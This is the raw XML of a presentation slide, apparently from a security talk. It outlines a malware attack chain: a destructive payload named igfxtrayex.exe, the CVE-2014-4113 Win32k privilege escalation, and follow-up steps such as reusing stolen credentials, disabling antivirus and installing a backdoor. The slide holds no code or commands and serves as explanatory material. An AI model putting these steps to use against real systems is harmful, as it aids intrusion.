                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="920"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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3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Execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926" name="Google Shape;926;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1322700"/>
            <a:ext cx="38520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Destructive Payload - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>igfxtrayex.exe</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>CVE-2014-4113</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>LPE (local privilege escalation vulnerability)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="927" name="Google Shape;927;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="2822150"/>
            <a:ext cx="38520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Leverage New Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Access more systems with stolen credentials</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Disable antivirus/firewall</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Install backdoor</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="928" name="Google Shape;928;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4172050" y="1265675"/>
            <a:ext cx="2150375" cy="683150"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInputOutput">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D8313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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>payload.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929" name="Google Shape;929;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6322425" y="3917450"/>
            <a:ext cx="2150375" cy="683150"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInputOutput">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="056D6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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>Win32k</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>.sys</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Google Shape;930;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4172050" y="3028213"/>
            <a:ext cx="2150375" cy="683150"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:pr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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>Manipulate pointers to out of bounds memory</a:t>
            </a:r>
            <a:endParaRPr i="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="931" name="Google Shape;931;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537550" y="2029488"/>
            <a:ext cx="2150375" cy="683150"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:pr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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>Return</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t> secure access tokens</a:t>
            </a:r>
            <a:endParaRPr i="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="932" name="Google Shape;932;p37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="928" idx="4"/>
            <a:endCxn id="930" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5247238" y="1948825"/>
            <a:ext cx="0" cy="1079400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="933" name="Google Shape;933;p37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="930" idx="2"/>
            <a:endCxn id="929" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="5618488" y="3340113"/>
            <a:ext cx="547800" cy="1290300"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="934" name="Google Shape;934;p37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="929" idx="0"/>
            <a:endCxn id="931" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7612650" y="2712650"/>
            <a:ext cx="0" cy="1204800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="935" name="Google Shape;935;p37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="931" idx="0"/>
            <a:endCxn id="928" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="6648988" y="1065738"/>
            <a:ext cx="422100" cy="1505400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="936" name="Google Shape;936;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5224800" y="1265675"/>
            <a:ext cx="2150375" cy="683150"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInputOutput">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D8313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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>payload.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="937" name="Google Shape;937;p37" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5877920" y="2341775"/>
            <a:ext cx="844125" cy="844151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="938" name="Google Shape;938;p37" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676770" y="2341775"/>
            <a:ext cx="844125" cy="844151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="939" name="Google Shape;939;p37" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5877920" y="3578875"/>
            <a:ext cx="844125" cy="844150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="940" name="Google Shape;940;p37" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7079070" y="2341775"/>
            <a:ext cx="844125" cy="844151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="941" name="Google Shape;941;p37" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7079070" y="3578875"/>
            <a:ext cx="844125" cy="844150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="942" name="Google Shape;942;p37" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676770" y="3578875"/>
            <a:ext cx="844125" cy="844150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="943" name="Google Shape;943;p37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="936" idx="4"/>
            <a:endCxn id="937" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299988" y="1948825"/>
            <a:ext cx="0" cy="393000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="944" name="Google Shape;944;p37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="937" idx="1"/>
            <a:endCxn id="938" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5520920" y="2763850"/>
            <a:ext cx="357000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="945" name="Google Shape;945;p37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="937" idx="2"/>
            <a:endCxn id="942" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5098782" y="3185925"/>
            <a:ext cx="1201200" cy="393000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="946" name="Google Shape;946;p37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="937" idx="2"/>
            <a:endCxn id="939" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299982" y="3185925"/>
            <a:ext cx="0" cy="393000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="947" name="Google Shape;947;p37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="937" idx="2"/>
            <a:endCxn id="941" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6299982" y="3185925"/>
            <a:ext cx="1201200" cy="393000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="948" name="Google Shape;948;p37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="937" idx="3"/>
            <a:endCxn id="940" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6722045" y="2763850"/>
            <a:ext cx="357000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Green arrow | Free SVG" id="949" name="Google Shape;949;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="23419" r="24303" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6421125" y="2278312"/>
            <a:ext cx="300925" cy="433001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Green arrow | Free SVG" id="950" name="Google Shape;950;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="23419" r="24303" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7622275" y="2278312"/>
            <a:ext cx="300926" cy="433001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Green arrow | Free SVG" id="951" name="Google Shape;951;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="23419" r="24303" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7622275" y="3488662"/>
            <a:ext cx="300926" cy="433000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Green arrow | Free SVG" id="952" name="Google Shape;952;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="23419" r="24303" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6421125" y="3488662"/>
            <a:ext cx="300925" cy="433000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Green arrow | Free SVG" id="953" name="Google Shape;953;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="23419" r="24303" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5219975" y="3488662"/>
            <a:ext cx="300925" cy="433000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Green arrow | Free SVG" id="954" name="Google Shape;954;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="23419" r="24303" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5219975" y="2278312"/>
            <a:ext cx="300925" cy="433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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="926"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="928"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="930"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="932"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="933"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="931"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="934"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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28"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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29"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1000"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
